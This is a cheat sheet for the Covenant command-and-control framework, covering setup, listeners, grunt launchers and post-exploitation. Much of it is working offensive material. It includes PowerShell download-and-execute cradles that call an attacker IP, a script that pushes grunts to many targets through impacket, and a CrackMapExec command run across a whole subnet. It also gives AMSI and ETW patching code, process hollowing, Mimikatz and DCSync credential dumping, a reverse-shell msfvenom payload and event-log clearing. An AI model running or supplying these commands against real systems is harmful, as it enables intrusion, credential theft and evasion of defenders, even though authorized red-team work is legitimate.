Covenant C2 Framework Cheat Sheet

Overview

Covenant is a .NET-based command and control (C2) framework designed for red team operations and penetration testing. It features a web-based interface for team collaboration, supports multiple communication protocols, and provides extensive post-exploitation capabilities specifically tailored for Windows environments using .NET assemblies.

⚠️ Warning: This tool is intended for authorized penetration testing and red team exercises only. Ensure you have proper authorization before using against any target.

Installation

Prerequisites

# Install .NET Core SDK (3.1 or later)
wget https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
sudo dpkg -i packages-microsoft-prod.deb
sudo apt update
sudo apt install -y dotnet-sdk-6.0

# Verify installation
dotnet --version

Docker Installation (Recommended)

# Clone Covenant repository
git clone --recurse-submodules https://github.com/cobbr/Covenant.git
cd Covenant/Covenant

# Build Docker image
docker build -t covenant .

# Run Covenant container
docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant covenant

# Access web interface
# Navigate to https://localhost:7443

Manual Installation

# Clone repository
git clone --recurse-submodules https://github.com/cobbr/Covenant.git
cd Covenant/Covenant

# Build Covenant
dotnet build

# Run Covenant
dotnet run

# Access web interface at https://localhost:7443

Kali Linux Installation

# Install from Kali repositories
sudo apt update
sudo apt install covenant

# Or build from source
git clone https://github.com/cobbr/Covenant.git
cd Covenant/Covenant
dotnet build
dotnet run

Basic Usage

Initial Setup

# First-time setup
1. Navigate to https://localhost:7443
2. Create admin user account
3. Accept SSL certificate warnings
4. Complete initial configuration wizard

# Default credentials (change immediately)
Username: CovenantAdmin
Password: CovenantPassword

Web Interface Navigation

Section	Description
Dashboard	Overview of active grunts and listeners
Listeners	Manage communication listeners
Grunts	Manage compromised hosts (agents)
Tasks	Execute commands and modules
Templates	Manage grunt templates and launchers
Users	User management and permissions
Data	Collected data and file downloads

Listeners Management

Creating HTTP Listener

# Web Interface Steps:
1. Navigate to Listeners → Create
2. Select HTTP Listener
3. Configure parameters:
   - Name: HTTP-Listener-80
   - Bind Address: 0.0.0.0
   - Bind Port: 80
   - Connect Address: [Your IP]
   - Connect Port: 80
   - Use SSL: False

# Advanced HTTP Configuration
- Profile: DefaultHttpProfile
- URLs: /en-us/index.html,/en-us/docs.html
- User Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Creating HTTPS Listener

# HTTPS Listener Configuration:
1. Navigate to Listeners → Create
2. Select HTTP Listener
3. Configure parameters:
   - Name: HTTPS-Listener-443
   - Bind Address: 0.0.0.0
   - Bind Port: 443
   - Connect Address: [Your IP]
   - Connect Port: 443
   - Use SSL: True
   - SSL Certificate: [Upload or generate]

# Generate SSL Certificate
openssl req -new -x509 -keyout covenant.key -out covenant.crt -days 365 -nodes

Bridge Listener (SMB)

# SMB Bridge Configuration:
1. Navigate to Listeners → Create
2. Select Bridge Listener
3. Configure parameters:
   - Name: SMB-Bridge
   - Bind Address: 0.0.0.0
   - Bind Port: 445
   - Connect Address: [Target IP]
   - Connect Port: 445
   - Profile: SMBBridgeProfile

Grunt Generation and Deployment

PowerShell Grunt

# Generate PowerShell launcher
1. Navigate to Launchers → PowerShell
2. Configure parameters:
   - Listener: HTTP-Listener-80
   - Delay: 5
   - Jitter: 0.1
   - Connect Attempts: 5000
   - Kill Date: [Future date]

# Generated PowerShell command example:
powershell -Sta -Nop -Window Hidden -EncodedCommand [Base64EncodedPayload]

# Execute on target
powershell.exe -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://[IP]/launcher.ps1')"

Binary Grunt

# Generate binary executable
1. Navigate to Launchers → Binary
2. Configure parameters:
   - Listener: HTTPS-Listener-443
   - Output Kind: ConsoleApplication
   - Target Framework: net40
   - Delay: 10
   - Jitter: 0.2

# Download and execute on target
# Binary will be generated as .exe file

MSBuild Grunt

<!-- MSBuild launcher for living-off-the-land execution -->
1. Navigate to Launchers → MSBuild
2. Configure listener and parameters
3. Generated MSBuild XML file:

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="MSBuild">
    <MSBuildTask />
  </Target>
  <UsingTask TaskName="MSBuildTask" TaskFactory="CodeTaskFactory" 
             AssemblyFile="Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Class" Language="cs">
        <![CDATA[
        // Covenant grunt code here
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

# Execute with:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe payload.xml

InstallUtil Grunt

# InstallUtil launcher
1. Navigate to Launchers → InstallUtil
2. Configure parameters
3. Execute on target:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe

Grunt Management

Grunt Interaction

# Basic grunt commands
help                    # Show available commands
whoami                  # Get current user context
hostname                # Get computer name
pwd                     # Get current directory
ls                      # List directory contents
cd [directory]          # Change directory
cat [file]              # Read file contents
download [file]         # Download file from target
upload [local] [remote] # Upload file to target

Process Management

# Process operations
ps                      # List running processes
kill [PID]              # Terminate process
getpid                  # Get current process ID
ppid                    # Get parent process ID

# Process injection
inject [PID] [assembly] # Inject .NET assembly into process
shinject [PID] [shellcode] # Inject shellcode into process

Credential Operations

# Credential harvesting
mimikatz                # Execute Mimikatz
logonpasswords          # Dump logon passwords
lsadump                 # Dump LSA secrets
dcsync [domain] [user]  # DCSync attack
golden [options]        # Golden ticket creation

# Token manipulation
steal_token [PID]       # Steal process token
make_token [user] [pass] # Create new token
rev2self                # Revert to original token

Lateral Movement

# WMI execution
wmi [computer] [command] # Execute command via WMI
wmiexec [computer] [user] [pass] [command] # WMI with credentials

# PowerShell remoting
winrm [computer] [command] # Execute via WinRM
invoke-command [computer] [scriptblock] # PowerShell remoting

# Service creation
sc [computer] [service] [binary] # Create and start service

Advanced Modules

Persistence Mechanisms

# Registry persistence
persist_registry [key] [value] [payload] # Registry autorun

# Scheduled task persistence
persist_schtask [name] [trigger] [payload] # Scheduled task

# Service persistence
persist_service [name] [payload] # Windows service

# WMI persistence
persist_wmi [filter] [consumer] [payload] # WMI event subscription

Privilege Escalation

# UAC bypass techniques
bypassuac [method]      # Various UAC bypass methods
eventvwr                # Event Viewer UAC bypass
fodhelper               # FodHelper UAC bypass
computerdefaults        # Computer Defaults UAC bypass

# Kernel exploits
ms16-032                # Secondary Logon Handle Privilege Escalation
ms16-135                # Windows Kernel-Mode Drivers EoP

Data Collection

# System information
sysinfo                 # Detailed system information
env                     # Environment variables
netstat                 # Network connections
arp                     # ARP table
route                   # Routing table

# File system operations
find [pattern]          # Search for files
tree [directory]        # Directory tree
drives                  # List available drives

Network Operations

# Port scanning
portscan [target] [ports] # TCP port scan
ping [target]           # ICMP ping
nslookup [hostname]     # DNS lookup

# Network shares
net share               # List local shares
net use                 # List network connections
net view [computer]     # List remote shares

Team Collaboration

User Management

# Web Interface User Operations:
1. Navigate to Users section
2. Create new user accounts
3. Assign roles and permissions:
   - Administrator: Full access
   - User: Limited access
   - Listener: Listener management only

Data Sharing

# File management
1. Navigate to Data → Files
2. View downloaded files from all grunts
3. Share files between team members
4. Export data for analysis

# Credential sharing
1. Navigate to Data → Credentials
2. View harvested credentials
3. Export credential database

Reporting

# Generate reports
1. Navigate to Data → Events
2. Filter by time range and grunt
3. Export activity logs
4. Generate executive summary

Automation and Scripting

Grunt Automation Script

// C# automation script for Covenant
using System;
using System.Threading.Tasks;
using Covenant.Models;

public class AutomationScript
{
    public async Task ExecuteAutomation(Grunt grunt)
    {
        // Automated reconnaissance
        await grunt.ExecuteTask("whoami");
        await grunt.ExecuteTask("hostname");
        await grunt.ExecuteTask("sysinfo");
        await grunt.ExecuteTask("ps");
        
        // Credential harvesting
        if (grunt.Integrity == "High")
        {
            await grunt.ExecuteTask("mimikatz");
            await grunt.ExecuteTask("logonpasswords");
        }
        
        // Network discovery
        await grunt.ExecuteTask("netstat");
        await grunt.ExecuteTask("arp");
        await grunt.ExecuteTask("net view");
        
        // Persistence
        await grunt.ExecuteTask("persist_registry HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Update payload.exe");
    }
}

PowerShell Automation

# PowerShell script for automated grunt management
function Invoke-CovenantAutomation {
    param(
        [string]$CovenantURL = "https://localhost:7443",
        [string]$Username,
        [string]$Password
    )
    
    # Authenticate to Covenant API
    $auth = @{
        UserName = $Username
        Password = $Password
    }
    
    $session = Invoke-RestMethod -Uri "$CovenantURL/api/users/login" -Method POST -Body ($auth | ConvertTo-Json) -ContentType "application/json"
    
    # Get active grunts
    $grunts = Invoke-RestMethod -Uri "$CovenantURL/api/grunts" -Headers @{Authorization = "Bearer $($session.token)"}
    
    foreach ($grunt in $grunts) {
        if ($grunt.Status -eq "Active") {
            Write-Host "Processing grunt: $($grunt.Name)"
            
            # Execute reconnaissance commands
            $commands = @("whoami", "hostname", "sysinfo", "ps")
            foreach ($cmd in $commands) {
                $task = @{
                    Type = "GruntTask"
                    GruntId = $grunt.Id
                    Command = $cmd
                }
                
                Invoke-RestMethod -Uri "$CovenantURL/api/grunttasks" -Method POST -Body ($task | ConvertTo-Json) -ContentType "application/json" -Headers @{Authorization = "Bearer $($session.token)"}
                Start-Sleep -Seconds 2
            }
        }
    }
}

# Usage
Invoke-CovenantAutomation -Username "admin" -Password "password"

Batch Grunt Deployment

#!/bin/bash

# Batch grunt deployment script
COVENANT_URL="https://your-covenant-server:7443"
TARGETS_FILE="targets.txt"

# Generate PowerShell launcher
LAUNCHER=$(curl -s -k -X GET "$COVENANT_URL/api/launchers/powershell/1" -H "Authorization: Bearer $TOKEN" | jq -r '.LauncherString')

# Deploy to multiple targets
while read -r target; do
    echo "[+] Deploying to $target"
    
    # Method 1: WMI execution
    impacket-wmiexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "powershell -exec bypass -c \"$LAUNCHER\""
    
    # Method 2: PSExec
    impacket-psexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "powershell -exec bypass -c \"$LAUNCHER\""
    
    # Method 3: SMB + scheduled task
    impacket-smbexec "$DOMAIN/$USERNAME:$PASSWORD@$target" "schtasks /create /tn Update /tr \"powershell -exec bypass -c \\\"$LAUNCHER\\\"\" /sc once /st 00:00"
    
    sleep 5
done < "$TARGETS_FILE"

Evasion Techniques

AMSI Bypass

// AMSI bypass in Covenant grunt
[System.Diagnostics.CodeAnalysis.SuppressMessage("Microsoft.Usage", "CA2201:DoNotRaiseReservedExceptionTypes")]
public static void BypassAMSI()
{
    try
    {
        var amsiContext = Marshal.AllocHGlobal(9076);
        var amsiSession = Marshal.AllocHGlobal(9076);
        var amsiScanBuffer = Marshal.AllocHGlobal(9076);
        
        // AMSI bypass implementation
        var amsiDll = LoadLibrary("amsi.dll");
        var amsiScanBufferAddr = GetProcAddress(amsiDll, "AmsiScanBuffer");
        
        var patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
        var oldProtect = VirtualProtect(amsiScanBufferAddr, (UIntPtr)patch.Length, 0x40, out uint _);
        Marshal.Copy(patch, 0, amsiScanBufferAddr, patch.Length);
        VirtualProtect(amsiScanBufferAddr, (UIntPtr)patch.Length, oldProtect, out uint _);
    }
    catch { }
}

ETW Bypass

// ETW bypass implementation
public static void BypassETW()
{
    try
    {
        var ntdll = LoadLibrary("ntdll.dll");
        var etwEventWrite = GetProcAddress(ntdll, "EtwEventWrite");
        
        var patch = new byte[] { 0xC3 }; // ret instruction
        var oldProtect = VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, 0x40, out uint _);
        Marshal.Copy(patch, 0, etwEventWrite, patch.Length);
        VirtualProtect(etwEventWrite, (UIntPtr)patch.Length, oldProtect, out uint _);
    }
    catch { }
}

Process Hollowing

// Process hollowing implementation
public static void ProcessHollow(string targetProcess, byte[] payload)
{
    var startupInfo = new STARTUPINFO();
    var processInfo = new PROCESS_INFORMATION();
    
    // Create suspended process
    CreateProcess(null, targetProcess, IntPtr.Zero, IntPtr.Zero, false, 
                 ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, 
                 ref startupInfo, out processInfo);
    
    // Unmap original image
    ZwUnmapViewOfSection(processInfo.hProcess, GetImageBase(processInfo.hProcess));
    
    // Allocate memory and write payload
    var baseAddress = VirtualAllocEx(processInfo.hProcess, GetImageBase(processInfo.hProcess), 
                                   payload.Length, AllocationType.Commit | AllocationType.Reserve, 
                                   MemoryProtection.ExecuteReadWrite);
    
    WriteProcessMemory(processInfo.hProcess, baseAddress, payload, payload.Length, out _);
    
    // Resume execution
    ResumeThread(processInfo.hThread);
}

Integration with Other Tools

Metasploit Integration

# Use Covenant with Metasploit
# Generate Metasploit payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -f exe -o meterpreter.exe

# Upload via Covenant grunt
upload meterpreter.exe C:\Windows\Temp\update.exe

# Execute Metasploit payload
execute C:\Windows\Temp\update.exe

# Use Metasploit for post-exploitation
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 192.168.1.100
set LPORT 443
run

BloodHound Integration

# Collect BloodHound data via Covenant
# Upload SharpHound to target
upload SharpHound.exe C:\Windows\Temp\collector.exe

# Run BloodHound collection
execute C:\Windows\Temp\collector.exe -c All -d domain.local

# Download collected data
download C:\Windows\Temp\*BloodHound.zip

# Import into BloodHound
neo4j start
./BloodHound --no-sandbox
# Import downloaded zip file

CrackMapExec Integration

# Use CME for initial access, Covenant for persistence
# Initial compromise via CME
crackmapexec smb 192.168.1.0/24 -u username -p password --exec-method wmiexec -x "powershell -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.100/launcher.ps1')\""

# Verify Covenant grunt connection
# Use Covenant for further exploitation

Operational Security

Communication Security

# Use domain fronting
1. Configure CloudFlare or similar CDN
2. Set up domain fronting rules
3. Configure Covenant listener with fronted domain
4. Use legitimate-looking URLs and user agents

# Certificate management
# Use legitimate SSL certificates
certbot certonly --standalone -d your-domain.com
# Configure Covenant with legitimate certificate

Traffic Obfuscation

# Custom HTTP profiles
1. Navigate to Profiles → HTTP
2. Create custom profile mimicking legitimate traffic:
   - User agents from target environment
   - URLs matching legitimate applications
   - Headers matching expected traffic

# Malleable C2 profiles
# Create custom communication patterns
# Mimic legitimate applications (Office 365, Google, etc.)

Anti-Forensics

# Event log clearing
wevtutil cl System
wevtutil cl Security
wevtutil cl Application

# Timestomping
timestomp C:\Windows\Temp\payload.exe -f C:\Windows\System32\notepad.exe

# Memory cleanup
# Implement memory wiping in custom tasks
# Use process migration to avoid memory analysis

Troubleshooting

Common Issues

# Grunt not connecting
1. Check firewall rules on Covenant server
2. Verify listener configuration
3. Test network connectivity
4. Check antivirus interference

# SSL certificate issues
# Generate new certificate
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes

# Performance issues
# Increase grunt delay and jitter
# Use multiple listeners for load balancing
# Optimize task execution frequency

Debug Mode

# Enable debug logging
1. Navigate to Administration → Settings
2. Enable debug logging
3. Check logs in Data → Events
4. Monitor grunt communication

# Network troubleshooting
# Use Wireshark to analyze traffic
# Check for network filtering
# Verify DNS resolution

Database Issues

# Reset Covenant database
cd Covenant/Covenant
rm -rf Data/covenant.db
dotnet run

# Backup database
cp Data/covenant.db Data/covenant.db.backup

# Restore database
cp Data/covenant.db.backup Data/covenant.db

Best Practices

Operational Planning

1. Pre-engagement setup: Configure listeners and profiles before engagement
2. Team coordination: Use role-based access control for team members
3. Communication protocols: Establish clear communication channels
4. Data handling: Implement secure data collection and storage procedures
5. Cleanup procedures: Plan for artifact removal and cleanup

Security Considerations

# Secure Covenant deployment
# Use strong authentication
# Enable HTTPS with valid certificates
# Implement network segmentation
# Regular security updates

# Grunt management
# Use unique grunt names
# Implement kill dates
# Regular grunt rotation
# Secure communication channels

Documentation

# Maintain operation logs
# Document all activities
# Track compromised systems
# Record credential harvesting
# Generate executive reports

Resources

• Covenant GitHub Repository
• Covenant Documentation
• SpecterOps Blog Posts
• Red Team Village Covenant Training
• SANS Red Team Operations

---

This cheat sheet provides a comprehensive reference for using Covenant C2 framework. Always ensure you have proper authorization before conducting red team operations or penetration testing.